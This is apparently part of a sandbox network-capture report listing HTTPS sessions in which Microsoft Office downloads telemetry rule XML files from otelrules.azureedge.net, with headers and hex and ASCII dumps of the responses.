                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              105192.168.2.104981613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                              x-ms-request-id: 2ff5ce10-101e-0017-5791-3f47c7000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153209Z-174f7845968cpnpfhC1EWR3afc0000000wt0000000009kcw
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              106192.168.2.104981713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                              x-ms-request-id: dc0e935b-901e-005b-3791-3f2005000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153209Z-174f7845968cdxdrhC1EWRg0en0000000wyg00000000tbpn
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              107192.168.2.104981813.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:08 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                              x-ms-request-id: 216ae412-001e-0082-6078-405880000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153209Z-174f7845968xlwnmhC1EWR0sv80000000wz000000000b3mq
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              108192.168.2.104981913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:09 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:10 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                              x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153210Z-174f78459685m244hC1EWRgp2c0000000wug00000000qvpu
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:10 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              109192.168.2.104982013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:10 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                              x-ms-request-id: fde36bdf-c01e-000b-1591-3fe255000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153211Z-174f78459685m244hC1EWRgp2c0000000x1g000000002y77
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              110192.168.2.104982313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1427
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                              x-ms-request-id: ab6eb442-501e-0035-0e91-3fc923000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153211Z-174f7845968kdththC1EWRzvxn00000009h0000000006k77
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              111192.168.2.104982113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                              x-ms-request-id: 850f9e76-101e-0028-7b6a-408f64000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153211Z-174f7845968xlwnmhC1EWR0sv80000000x0g000000006214
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              112192.168.2.104982213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                              x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153211Z-174f7845968px8v7hC1EWR08ng0000000xeg00000000497s
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:11 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              113192.168.2.104982413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:12 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:12 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1390
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                              x-ms-request-id: 951aba40-201e-0085-5291-3f34e3000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153212Z-174f7845968psccphC1EWRuz9s0000000xbg00000000fe59
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
